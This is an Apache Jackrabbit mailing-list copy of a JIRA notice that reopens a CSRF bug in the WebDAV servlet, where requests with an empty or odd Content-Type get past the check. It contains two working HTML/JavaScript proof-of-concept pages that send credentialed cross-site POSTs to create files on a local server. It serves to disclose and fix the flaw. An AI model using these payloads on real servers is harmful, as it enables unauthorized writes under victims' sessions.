You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@jackrabbit.apache.org by "Dominique Jäggi (JIRA)" <ji...@apache.org> on 2016/08/12 14:27:20 UTC
[jira] [Reopened] (JCR-4002) CSRF in Jackrabbit-Webdav using empty
content-type
[ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Dominique Jäggi reopened JCR-4002:
----------------------------------
the previous fix lacks capability to catch all the permutations, while
being forced to remain backwards compatible (within reason) and not
being able to use a token system due to the nature of the DAV.
{code}
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:42427/test/asdf.txt", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text/p laiN");
xhr.withCredentials = true;
var body = "This+file+has+been+uploaded+via+CSRF.=";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
{code}
A radical solution would be to completely remove POST from the
AbstractWebdavServlet.
> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
> Affects Versions: 2.13.1
> Reporter: Dominique Jäggi
> Assignee: Dominique Jäggi
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
>
> As per [0] the CSRF content-type check does not include a null request content type. This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
> <body>
> <script>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
> </script>
> <form action="#">
> <input type="button" value="Submit request" onclick="submitRequest();" />
> </form>
> </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)